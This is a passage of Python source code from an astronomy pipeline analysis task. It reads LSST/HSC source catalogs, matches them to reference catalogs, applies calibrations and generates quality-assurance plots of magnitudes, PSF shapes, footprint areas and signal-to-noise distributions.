config.readFootprintsAs=\\\"heavy\\\"\"\n \"to be able to read in the footprints and compute their area.\")\n else:\n cat = addFootprintArea(cat)\n # Set some \"aliases\" for differing schema naming conventions.\n # Note: we lose the alias maps when converting to pandas, so now\n # must actually make a copy of the \"old\" column to a new one with\n # the \"new\" name. This is really just a backwards-compatibility\n # accommodation for catalogs that are already pretty old, so it\n # will be a no-op in most cases and will likely disappear in the\n # not-too-distant future.\n if aliasDictList:\n cat = addAliasColumns(cat, aliasDictList)\n # Add elementId column, where element is \"patch\" for coadd data and\n # \"ccd/detector\" for visit data (useful to have in Parquet tables\n # for subsequent interactive analysis).\n if \"patch\" in repoInfo.dataId: # This is a coadd catalog\n cat = addIntFloatOrStrColumn(cat, dataId[\"patch\"], \"patchId\",\n \"Patch on which source was detected\")\n else: # This is a visit catalog\n cat = addIntFloatOrStrColumn(cat, dataId[repoInfo.ccdKey], \"ccdId\",\n \"Id of CCD on which source was detected\")\n # Compute Focal Plane coordinates for each source if not\n # already there.\n if (self.config.doPlotCentroids or self.config.analysis.doPlotFP\n or self.config.analysisAstromMatches.doPlotFP\n or self.config.analysisPhotomMatches.doPlotFP):\n if \"base_FPPosition_x\" not in schema and \"focalplane_x\" not in schema:\n det = repoInfo.butler.get(\"calexp_detector\", dataId)\n cat = addFpPoint(det, cat)\n\n # Scale fluxes to common zeropoint to make basic comparison\n # plots without calibrated ZP influence.\n commonZpCat = cat.copy(True)\n commonZpCat = calibrateSourceCatalog(commonZpCat, self.config.analysis.commonZp)\n commonZpCatList.append(commonZpCat)\n if doApplyExternalPhotoCalib:\n if repoInfo.hscRun:\n if not dataRef.datasetExists(\"fcr_hsc_md\") or not dataRef.datasetExists(\"wcs_hsc\"):\n continue\n else:\n if not repoInfo.isGen3:\n # Check for both jointcal_wcs and wcs for\n # compatibility with old datasets.\n if not (dataRef.datasetExists(repoInfo.photoCalibDataset)\n or dataRef.datasetExists(\"fcr_md\")):\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(repoInfo.photoCalibDataset, dataId=dataRef[\"dataId\"])\n except LookupError:\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.photoCalibDataset))\n continue\n if doApplyExternalSkyWcs:\n if repoInfo.hscRun:\n if not dataRef.datasetExists(\"fcr_hsc_md\") or not dataRef.datasetExists(\"wcs_hsc\"):\n continue\n else:\n if not repoInfo.isGen3:\n # Check for both jointcal_wcs and wcs for\n # compatibility with old datasets.\n if not (dataRef.datasetExists(repoInfo.skyWcsDataset)\n or dataRef.datasetExists(\"wcs\")):\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(repoInfo.skyWcsDataset, dataId=dataId)\n except LookupError:\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.skyWcsDataset))\n continue\n\n fluxMag0 = None\n if not doApplyExternalPhotoCalib:\n photoCalib = repoInfo.butler.get(\"calexp\" + repoInfo.delimiterStr + \"photoCalib\", dataId)\n fluxMag0 = photoCalib.getInstFluxAtZeroMagnitude()\n cat = self.calibrateCatalogs(dataRef, cat, fluxMag0, repoInfo, doApplyExternalPhotoCalib,\n doApplyExternalSkyWcs, useMeasMosaic, iCat=iCat)\n catList.append(cat)\n if not catList:\n raise TaskError(\"No catalogs read: %s\" % ([dataId for dataRef in dataRefList]))\n\n return Struct(commonZpCatalog=concatenateCatalogs(commonZpCatList),\n catalog=concatenateCatalogs(catList), areaDict=areaDict, fakeCat=fakeCat)\n\n def readSrcMatches(self, repoInfo, dataRefList, dataset, refObjLoader, aliasDictList=None,\n goodFlagList=[], haveForced=False, doApplyExternalPhotoCalib=False,\n doApplyExternalSkyWcs=False, useMeasMosaic=False, readPackedMatchesOnly=False):\n \"\"\"Read in full records from the reference catalog used in calibration\n and match them to the source catalog.\n\n Calls loadReferencesAndMatchToCatalog() to load in the full reference\n records within the search radius used in SFM and performs a generic\n (RA/Dec) match to the source catalog, regardless of whether the objects\n were used in any calibration step. Culling of the source catalog based\n on flags (set in config.analysis.flags) can be performed prior to\n matching. Exceptions can be made with flags in goodFlagList, i.e.\n sources that have any of the flags in this list set will be retained\n for further (sub)selection and analysis, regardless of other flags\n being set.\n\n Parameters\n ----------\n repoInfo : `lsst.pipe.base.struct.Struct`\n A struct containing elements with repo information needed to\n determine if the catalog data is coadd or visit level and, if the\n latter, to create appropriate dataIds to look for the external\n calibration datasets.\n dataRefList : `list` of\n `lsst.daf.persistence.butlerSubset.ButlerDataRef`\n A list of butler data references whose catalogs of ``dataset``\n are to be read in.\n dataset : `str`\n Name of the catalog ``dataset`` to be read in, e.g.\n \"deepCoadd_obj\" (for coadds) or \"source\" (for visits).\n refObjLoader :\n `lsst.pex.config.configurableField.ConfigurableInstance` of\n `lsst.meas.algorithms.loadReferenceObjects.LoadReferenceObjectsTask`\n Reference object loader to read in the reference catalogs.\n aliasDictList : `dict` or `None`, optional\n A `dict` of alias columns to add for backwards compatibility with\n old repositories.\n goodFlagList : `list` of `str`, optional\n List of column flag names for which to retain catalog sources\n having any one of them set to `True`, regardless of any other flags\n being set. For example, it may be desirable to keep all sources\n that were used in the SFM calibration (identified by the\n \"calib_*_used\" flags).\n haveForced : `bool`, optional\n A boolean indicating if a forced_src catalog exists in the\n repository associated with ``repoInfo``.\n doApplyExternalPhotoCalib : `bool`, optional\n If `True`: Apply the external photometric calibrations specified by\n ``repoInfo.photoCalibDataset`` to the catalog.\n If `False`: Apply the ``fluxMag0`` photometric calibration from\n Single Frame Measuerment to the catalog.\n doApplyExternalSkyWcs : `bool`, optional\n If `True`: Apply the external astrometric calibrations specified by\n ``repoInfo.skyWcsDataset`` the catalog.\n If `False`: Retain the WCS from Single Frame Measurement.\n useMeasMosaic : `bool`, optional\n Use meas_mosaic's applyMosaicResultsCatalog for the external\n calibration (even if photoCalib object exists). For testing\n implementations.\n readPackedMatchesOnly : `bool`, optional\n If `True`, simply read in and denormalize the persisted srcMatch\n tables, i.e. those that record the matches used in the SFM\n astrometric calibration and return the result.\n\n Raises\n ------\n TaskError\n If no matches are found in the entire ``dataRefList``.\n\n Returns\n -------\n allMatches : `pandas.core.frame.DataFrame`\n The concatenated matched catalog.\n matchAreaDict : `dict`\n A `dict` containing the area and corner locations of each element\n (detector for visits, patch for coadds).\n \"\"\"\n matchList = []\n matchAreaDict = {}\n dataIdSubList = []\n butler = repoInfo.butler\n for dataRef in dataRefList:\n dataId = dataRef[\"dataId\"] if repoInfo.isGen3 else dataRef.dataId\n if not repoInfo.isGen3:\n if not dataRef.datasetExists(dataset):\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".format(dataId, dataset))\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(dataset, dataId=dataId)\n except LookupError:\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".format(dataId, dataset))\n continue\n # Generate unnormalized match list (using load center and radius\n # obtained from the normalized persisted srcMatch catalog) with\n # loadReferencesAndMatchToCatalog (which requires a refObjLoader to\n # be initialized).\n if self.config.doReadParquetTables:\n if \"Coadd\" in dataset:\n datasetType = dataset[:dataset.find(\"Coadd_\") + len(\"Coadd_\")] + \"obj\"\n dfDataset = dataset[dataset.find(\"Coadd_\") + len(\"Coadd_\"):]\n baseDataset = dataset[:dataset.find(\"Coadd_\") + len(\"Coadd_\") - 1]\n else:\n datasetType = \"source\"\n dfDataset = \"\"\n baseDataset = \"\"\n catalog, _ = self.readParquetTables([dataRef, ], datasetType, repoInfo, dfDataset=dfDataset,\n doApplyExternalPhotoCalib=doApplyExternalPhotoCalib,\n doApplyExternalSkyWcs=doApplyExternalSkyWcs,\n useMeasMosaic=useMeasMosaic)\n areaDict, _ = computeAreaDict(repoInfo, [dataRef, ], dataset=baseDataset)\n else:\n if \"patch\" in dataId: # This is a coadd catalog\n catalogStruct = self.readAfwCoaddTables([dataRef, ], repoInfo, haveForced,\n aliasDictList=aliasDictList)\n if \"Coadd_meas\" in dataset:\n catalog = catalogStruct.unforced\n if \"Coadd_forced_src\" in dataset:\n catalog = catalogStruct.forced\n areaDict = catalogStruct.areaDict\n else: # This is a visit catalog\n catStruct = self.readCatalogs(\n [dataRef, ], dataset, repoInfo, aliasDictList=aliasDictList,\n readFootprintsAs=self.config.readFootprintsAs,\n doApplyExternalPhotoCalib=doApplyExternalPhotoCalib,\n doApplyExternalSkyWcs=doApplyExternalSkyWcs, useMeasMosaic=useMeasMosaic)\n catalog = catStruct.catalog\n catalog = catalog.asAstropy().to_pandas().set_index(\"id\", drop=False)\n areaDict = catStruct.areaDict\n # Set boolean array indicating sources deemed unsuitable for qa\n # analyses.\n mdjList = []\n if \"Coadd\" in dataset:\n packedMatches = butler.get(self.config.coaddName + \"Coadd_measMatch\", dataId)\n coaddUri = butler.getUri(self.config.coaddName + \"Coadd_calexp\", dataId)\n coaddReader = afwImage.ExposureFitsReader(coaddUri)\n for visit in coaddReader.readCoaddInputs().visits[\"id\"]:\n try:\n for ccd in repoInfo.camera:\n if ccd.getType() == cameraGeom.DetectorType.SCIENCE:\n if dataRef.datasetExists(\"calexp\", visit=int(visit), ccd=ccd.getId()):\n ccdExists = ccd\n break\n calexpUri = butler.getUri(\"calexp\", visit=int(visit), ccd=ccdExists.getId())\n calexpReader = afwImage.ExposureFitsReader(calexpUri)\n mjd = calexpReader.readVisitInfo().getDate().get(system=DateTime.MJD,\n scale=DateTime.TAI)\n except Exception:\n mjd = np.nan\n mdjList.append(mjd)\n else:\n packedMatches = butler.get(dataset + \"Match\", dataId)\n matchMeta = packedMatches.table.getMetadata()\n try:\n mjd = matchMeta.getDouble(\"EPOCH\")\n except Exception:\n try:\n if not repoInfo.isGen3:\n rawUri = butler.getUri(\"calexp\", dataId)\n else:\n rawUri = butler.getURI(dataset + \"calexp\", dataId)\n rawUri = rawUri.path\n rawReader = afwImage.ExposureFitsReader(rawUri)\n mjd = rawReader.readMetadata().getDouble(\"MJD\")\n except Exception:\n mjd = np.nan\n mdjList.append(mjd)\n epoch = np.nanmean(mdjList) if not all(np.isnan(mdjList)) else None\n\n if not packedMatches:\n self.log.warning(\"No good matches for %s\" % (dataId,))\n continue\n if hasattr(refObjLoader, \"apply\"): # Need to/can only do this once per loader\n refObjLoader = refObjLoader.apply(butler=butler)\n if readPackedMatchesOnly:\n calibKey = \"calib_astrometry_used\" if \"patch\" not in dataId else None\n matches = loadDenormalizeAndUnpackMatches(catalog, packedMatches, refObjLoader, epoch=epoch,\n calibKey=calibKey, log=self.log)\n if matches is None:\n return None\n else:\n matchMeta = packedMatches.table.getMetadata()\n matches = loadReferencesAndMatchToCatalog(\n catalog, matchMeta, refObjLoader, epoch=epoch, matchRadius=self.matchRadius,\n matchFlagList=self.config.analysis.flags, goodFlagList=goodFlagList,\n minSrcSn=self.config.minSrcSignalToNoiseForMatches, log=self.log)\n # LSST reads in reference catalogs with flux in \"nanojanskys\", so\n # must convert to AB.\n matches = matchNanojanskyToAB(matches)\n matchAreaDict.update(areaDict)\n if matches.empty:\n self.log.warning(\"No matches for %s\" % (dataId,))\n else:\n if \"patch\" not in dataId: # This is a visit catalog\n if self.config.doApplyExternalSkyWcs:\n # Update \"distance\" between reference and source\n # matches based on external-calibration positions.\n angularDist = AngularDistance(\"ref_coord_ra\", \"src_coord_ra\",\n \"ref_coord_dec\", \"src_coord_dec\")\n matches[\"distance\"] = angularDist(matches)\n\n # Avoid multi-counting when visit overlaps multiple tracts\n noTractId = dataId.copy()\n noTractId.pop(\"tract\")\n if noTractId not in dataIdSubList:\n matchList.append(matches)\n dataIdSubList.append(noTractId)\n else:\n matchList.append(matches)\n if not matchList:\n if repoInfo.isGen3:\n msg = \"No matches read: %s\" % ([dataRef.dataId for dataRef in dataRefList])\n else:\n msg = \"No matches read: %s\" % ([dataRef[\"dataId\"] for dataRef in dataRefList])\n raise TaskError(msg)\n\n allMatches = pd.concat(matchList, axis=0)\n return allMatches, matchAreaDict\n\n def calibrateCatalogs(self, catalog, wcs=None):\n self.zpLabel = \"common (\" + str(self.config.analysis.coaddZp) + \")\"\n # My persisted catalogs in lauren/LSST/DM-6816new all have nan for RA\n # and Dec (see DM-9556).\n if np.all(np.isnan(catalog[\"coord_ra\"])):\n if wcs is None:\n self.log.warning(\"Bad RA, Dec entries but can't update because wcs is None\")\n else:\n afwTable.updateSourceCoords(wcs, catalog)\n calibrated = calibrateSourceCatalog(catalog, self.config.analysis.coaddZp)\n return calibrated\n\n def plotMags(self, catalog, plotInfoDict, areaDict, matchRadius=None,\n matchRadiusUnitStr=None, zpLabel=None, forcedStr=None, fluxToPlotList=None,\n postFix=\"\", flagsCat=None, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n if not fluxToPlotList:\n fluxToPlotList = self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n for col in fluxToPlotList:\n if col + \"_instFlux\" in schema:\n shortName = \"mag_\" + col + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, MagDiff(col + \"_instFlux\", \"base_PsfFlux_instFlux\",\n unitScale=self.unitScale),\n \"Mag(%s) - PSFMag (%s)\" % (fluxToPlotString(col), unitStr),\n shortName, self.config.analysis, labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel,\n highlightList=highlightList)\n # Also make comparison plots for calib_psf_used only objects\n # for the circular aperture plots.\n if \"CircularApertureFlux_12_0\" in col:\n shortName = \"mag_\" + col + postFix + \"_calib_psf_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n calibHighlightList = highlightList.copy()\n for i, flagName in enumerate([col + \"_flag\", ] + list(self.config.analysis.flags)):\n if not any(flagName in highlight for highlight in calibHighlightList):\n calibHighlightList += [(flagName, 0, FLAGCOLORS[i%len(FLAGCOLORS)]), ]\n yield from self.AnalysisClass(catalog,\n MagDiff(col + \"_instFlux\", \"base_PsfFlux_instFlux\",\n unitScale=self.unitScale),\n (\"%s - PSF (calib_psf_used) (%s)\" % (fluxToPlotString(col),\n unitStr)),\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"],\n labeller=StarGalaxyLabeller(), unitScale=self.unitScale,\n fluxColumn=\"base_CircularApertureFlux_12_0_instFlux\"\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel,\n highlightList=calibHighlightList)\n\n def plotSizes(self, catalog, plotInfoDict, areaDict, matchRadius=None, zpLabel=None, forcedStr=None,\n postFix=\"\", highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n unitStr = \" (milli)\" if self.config.toMilli else \"\"\n plotAllKwargs = dict(matchRadius=matchRadius, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, highlightList=highlightList)\n calibHighlightList0 = None\n for col in [\"base_PsfFlux\", ]:\n if col + \"_instFlux\" in schema:\n if highlightList is not None:\n calibHighlightList0 = highlightList.copy()\n if not any(col + \"_flag\" in highlight for highlight in calibHighlightList0):\n calibHighlightList0 += [(col + \"_flag\", 0, \"yellow\"), ]\n compareCol = \"base_SdssShape\"\n # Set limits dynamically...can be very different visit-to-visit\n # due to seeing differences. SDSS and HSM should be similar,\n # so limits based on one should be valid for the other and\n # having the same scale eases comparisons between the two.\n traceSizeFunc = TraceSize(compareCol)\n\n # First do for calib_psf_used only.\n shortName = \"trace\" + postFix + \"_calib_psf_used\"\n psfUsed = catalog[catalog[\"calib_psf_used\"]].copy(deep=True)\n sdssTrace = traceSizeFunc(psfUsed)\n goodVals = np.isfinite(sdssTrace)\n psfUsed = psfUsed[goodVals].copy(deep=True)\n sdssTrace = sdssTrace[goodVals]\n traceMean = np.around(np.nanmean(sdssTrace), 2)\n traceStd = max(0.03, np.around(4.5*np.nanstd(sdssTrace), 2))\n qMin = traceMean - traceStd\n qMax = traceMean + traceStd\n self.log.info(\"shortName = {:s}\".format(shortName))\n if calibHighlightList0 is not None:\n calibHighlightList = calibHighlightList0.copy()\n if not any(compareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(compareCol + \"_flag\", 0, \"greenyellow\"), ]\n plotAllKwargs.update(highlightList=calibHighlightList)\n yield from self.AnalysisClass(psfUsed, sdssTrace,\n (\" SdssShape Trace (calib_psf_used): \"\n r\"$\\sqrt{0.5*(I_{xx}+I_{yy})}$ (pixels)\"),\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=qMin, qMax=qMax,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n if \"ext_shapeHSM_HsmSourceMoments_xx\" in schema:\n shortName = \"hsmTrace\" + postFix + \"_calib_psf_used\"\n compareCol = \"ext_shapeHSM_HsmSourceMoments\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n if calibHighlightList0 is not None:\n calibHighlightList = calibHighlightList0.copy()\n if not any(compareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(compareCol + \"_flag\", 0, \"greenyellow\"), ]\n plotAllKwargs.update(highlightList=calibHighlightList)\n yield from self.AnalysisClass(psfUsed, TraceSize(compareCol),\n (r\" HSM Trace (calib_psf_used): $\\sqrt{0.5*(I_{xx}\"\n r\"+I_{yy})}$ (pixels)\"), shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=qMin, qMax=qMax,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n\n # Now for all stars.\n compareCol = \"base_SdssShape\"\n shortName = \"trace\" + postFix\n starsOnly = catalog[catalog[\"base_ClassificationExtendedness_value\"] < 0.5].copy(deep=True)\n sdssTrace = traceSizeFunc(starsOnly)\n self.log.info(\"shortName = {:s}\".format(shortName))\n plotAllKwargs.update(highlightList=highlightList)\n yield from self.AnalysisClass(starsOnly, sdssTrace,\n r\" SdssShape Trace: $\\sqrt{0.5*(I_{xx}+I_{yy})}$ (pixels)\",\n shortName, self.config.analysis, qMin=qMin, qMax=qMax,\n labeller=StarGalaxyLabeller()).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n if \"ext_shapeHSM_HsmSourceMoments_xx\" in schema:\n shortName = \"hsmTrace\" + postFix\n compareCol = \"ext_shapeHSM_HsmSourceMoments\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(starsOnly, TraceSize(compareCol),\n r\"HSM Trace: $\\sqrt{0.5*(I_{xx}+I_{yy})}$ (pixels)\",\n shortName, self.config.analysis, qMin=qMin, qMax=qMax,\n labeller=StarGalaxyLabeller()).plotAll(shortName,\n plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n\n if col + \"_instFlux\" in schema:\n shortName = \"psfTraceDiff\" + postFix\n compareCol = \"base_SdssShape\"\n psfCompareCol = \"base_SdssShape_psf\"\n if calibHighlightList is not None:\n if not any(compareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(compareCol + \"_flag\", 0, \"greenyellow\"), ]\n if not any(psfCompareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(psfCompareCol + \"_flag\", 0, \"lime\"), ]\n plotAllKwargs.update(highlightList=calibHighlightList)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, PsfTraceSizeDiff(compareCol, psfCompareCol),\n \" SdssShape Trace % diff (psf_used - PSFmodel)\", shortName,\n self.config.analysis, flags=[col + \"_flag\"],\n goodKeys=[\"calib_psf_used\"], qMin=-3.0, qMax=3.0,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n\n shortName = \"e1Resids\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, E1Resids(compareCol, psfCompareCol,\n unitScale=self.unitScale),\n \" SdssShape e1 resids (psf_used - PSFmodel)%s\" % unitStr,\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-0.05, qMax=0.05,\n labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n\n shortName = \"e2Resids\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, E2Resids(compareCol, psfCompareCol,\n unitScale=self.unitScale),\n \" SdssShape e2 resids (psf_used - PSFmodel)%s\" % unitStr,\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-0.05, qMax=0.05,\n labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n\n if \"ext_shapeHSM_HsmSourceMoments_xx\" in schema:\n shortName = \"psfHsmTraceDiff\" + postFix\n compareCol = \"ext_shapeHSM_HsmSourceMoments\"\n psfCompareCol = \"ext_shapeHSM_HsmPsfMoments\"\n if calibHighlightList0 is not None:\n calibHighlightList = calibHighlightList0.copy()\n if not any(compareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(compareCol + \"_flag\", 0, \"greenyellow\"), ]\n if not any(psfCompareCol + \"_flag\" in highlight for highlight in calibHighlightList):\n calibHighlightList += [(psfCompareCol + \"_flag\", 0, \"lime\"), ]\n plotAllKwargs.update(highlightList=calibHighlightList)\n self.log.info(\"shortName = {:s}\".format(shortName))\n\n yield from self.AnalysisClass(catalog, PsfTraceSizeDiff(compareCol, psfCompareCol),\n \"HSM Trace % diff (psf_used - PSFmodel)\", shortName,\n self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-3.0, qMax=3.0,\n labeller=StarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n shortName = \"e1ResidsHsm\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, E1Resids(compareCol, psfCompareCol,\n unitScale=self.unitScale),\n \" HSM e1 resids (psf_used - PSFmodel)%s\" % unitStr,\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-0.05, qMax=0.05,\n labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n shortName = \"e2ResidsHsm\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, E2Resids(compareCol, psfCompareCol,\n unitScale=self.unitScale),\n \" HSM e2 resids (psf_used - PSFmodel)%s\" % unitStr,\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], qMin=-0.05, qMax=0.05,\n labeller=StarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict,\n areaDict, self.log,\n **plotAllKwargs)\n\n def plotCentroidXY(self, catalog, plotInfoDict, areaDict, matchRadius=None, zpLabel=None,\n forcedStr=None, flagsCat=None, uberCalLabel=None, highlightList=None):\n yield\n schema = getSchema(catalog)\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.02*self.unitScale}})\n for col in [\"base_SdssCentroid_x\", \"base_SdssCentroid_y\"]:\n if col in schema:\n shortName = col\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, catalog[col], \"(%s)\" % col, shortName,\n self.config.analysis, labeller=StarGalaxyLabeller(),\n ).plotFP(shortName, plotInfoDict, self.log, enforcer=enforcer,\n matchRadius=matchRadius, zpLabel=zpLabel,\n forcedStr=forcedStr)\n\n def plotFootprint(self, catalog, plotInfoDict, areaDict, matchRadius=None, zpLabel=None, forcedStr=None,\n postFix=\"\", flagsCat=None, plotRunStats=False, highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n enforcer = None\n plotAllKwargs = dict(matchRadius=matchRadius, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, highlightList=highlightList)\n if \"calib_psf_used\" in schema:\n shortName = \"footArea_calib_psf_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n\n yield from self.AnalysisClass(catalog, catalog[\"base_FootprintArea_value\"], \"%s\" % shortName,\n shortName, self.config.analysis, goodKeys=[\"calib_psf_used\"],\n qMin=-100, qMax=2000, labeller=StarGalaxyLabeller(),\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n plotRunStats=plotRunStats, **plotAllKwargs)\n shortName = \"footArea\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, catalog[\"base_FootprintArea_value\"], \"%s\" % shortName,\n shortName, self.config.analysis,\n qMin=0, qMax=3000, labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, plotRunStats=plotRunStats, **plotAllKwargs)\n\n def plotFootprintHist(self, catalog, description, plotInfoDict, matchRadius=None, zpLabel=None,\n postFix=\"\", flagsCat=None, uberCalLabel=None, forcedStr=None):\n yield\n stats = None\n shortName = \"footArea\"\n self.log.info(\"shortName = {:s}\".format(shortName + \"Hist\"))\n yield from self.AnalysisClass(catalog, catalog[\"base_FootprintArea_value\"], \"%s\" % shortName,\n shortName, self.config.analysis, qMin=0, qMax=3000,\n labeller=StarGalaxyLabeller()\n ).plotHistogram(description, plotInfoDict, stats=stats,\n matchRadius=matchRadius, zpLabel=zpLabel,\n filterStr=plotInfoDict[\"filter\"],\n uberCalLabel=uberCalLabel, forcedStr=forcedStr)\n\n def plotPsfFluxSnHists(self, catalog, description, plotInfoDict, areaDict, matchRadius=None,\n zpLabel=None, forcedStr=None, uberCalLabel=None, postFix=\"\",\n logPlot=True, density=True, cumulative=-1):\n yield\n schema = getSchema(catalog)\n stats = None\n shortName = \"psfInstFlux\" if zpLabel == \"raw\" else \"psfCalFlux\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n # want \"raw\" flux\n factor = 10.0**(0.4*self.config.analysis.commonZp) if zpLabel == \"raw\" else NANOJANSKYS_PER_AB_FLUX\n psfFlux = catalog[\"base_PsfFlux_instFlux\"]*factor\n psfFluxErr = catalog[\"base_PsfFlux_instFluxErr\"]*factor\n # Cull here so that all subsets get the same culling\n bad = makeBadArray(catalog, flagList=self.config.analysis.flags)\n psfFlux = psfFlux[~bad]\n psfFluxErr = psfFluxErr[~bad]\n psfSn = psfFlux/psfFluxErr\n\n # Scale S/N threshold by ~sqrt(#exposures) if catalog is coadd data\n if \"base_InputCount_value\" in schema:\n inputCounts = catalog[\"base_InputCount_value\"]\n scaleFactor = computeMeanOfFrac(inputCounts, tailStr=\"upper\", fraction=0.1, floorFactor=10)\n if scaleFactor == 0.0:\n scaleFactor = computeMeanOfFrac(inputCounts, tailStr=\"upper\", fraction=0.1, floorFactor=1)\n highSn = np.floor(\n np.sqrt(scaleFactor)*self.config.analysis.signalToNoiseThreshold/100 + 0.49)*100\n else:\n highSn = self.config.analysis.signalToNoiseThreshold\n\n lowSn = 20.0\n lowFlux, highFlux = 4000.0, 12500.0\n goodSn = psfSn > lowSn\n psfFluxSnGtLow = psfFlux[goodSn]\n goodSn = psfSn > highSn\n psfFluxSnGtHigh = psfFlux[goodSn]\n goodFlux = psfFlux > lowFlux\n psfSnFluxGtLow = psfSn[goodFlux]\n goodFlux = psfFlux > highFlux\n psfSnFluxGtHigh = psfSn[goodFlux]\n psfUsedCat = catalog[catalog[\"calib_psf_used\"]]\n psfUsedPsfFlux = psfUsedCat[\"base_PsfFlux_instFlux\"]*factor\n psfUsedPsfFluxErr = psfUsedCat[\"base_PsfFlux_instFluxErr\"]*factor\n psfUsedPsfSn = psfUsedPsfFlux/psfUsedPsfFluxErr\n\n if \"lsst\" in plotInfoDict[\"cameraName\"]:\n filterStr = \"[\" + plotInfoDict[\"cameraName\"] + \"-\" + plotInfoDict[\"filter\"] + \"]\"\n else:\n filterStr = plotInfoDict[\"filter\"]\n yield from self.AnalysisClass(catalog[~bad], psfFlux, \"%s\" % shortName, shortName,\n self.config.analysis, qMin=0,\n qMax=int(min(99999, max(4.0*np.median(psfFlux), 0.25*np.max(psfFlux)))),\n labeller=AllLabeller()\n ).plotHistogram(description, plotInfoDict, numBins=\"sqrt\", stats=stats,\n zpLabel=zpLabel, forcedStr=forcedStr,\n filterStr=filterStr,\n uberCalLabel=uberCalLabel,\n vertLineList=[lowFlux, highFlux],\n logPlot=logPlot, density=False, cumulative=cumulative,\n addDataList=[psfFluxSnGtLow, psfFluxSnGtHigh,\n psfUsedPsfFlux],\n addDataLabelList=[\"S/N>{:.1f}\".format(lowSn),\n \"S/N>{:.1f}\".format(highSn),\n \"psf_used\"])\n shortName = \"psfInstFlux/psfInstFluxErr\" if zpLabel == \"raw\" else \"psfCalFlux/psfCalFluxErr\"\n description = description.replace(\"Flux\", \"FluxSn\")\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog[~bad], psfSn, \"%s\" % \"S/N = \" + shortName, shortName,\n self.config.analysis, qMin=0, qMax=4*highSn, labeller=AllLabeller()\n ).plotHistogram(description, plotInfoDict, numBins=\"sqrt\", stats=stats,\n zpLabel=zpLabel, forcedStr=forcedStr,\n filterStr=filterStr,\n uberCalLabel=uberCalLabel, vertLineList=[lowSn, highSn],\n logPlot=logPlot, density=False, 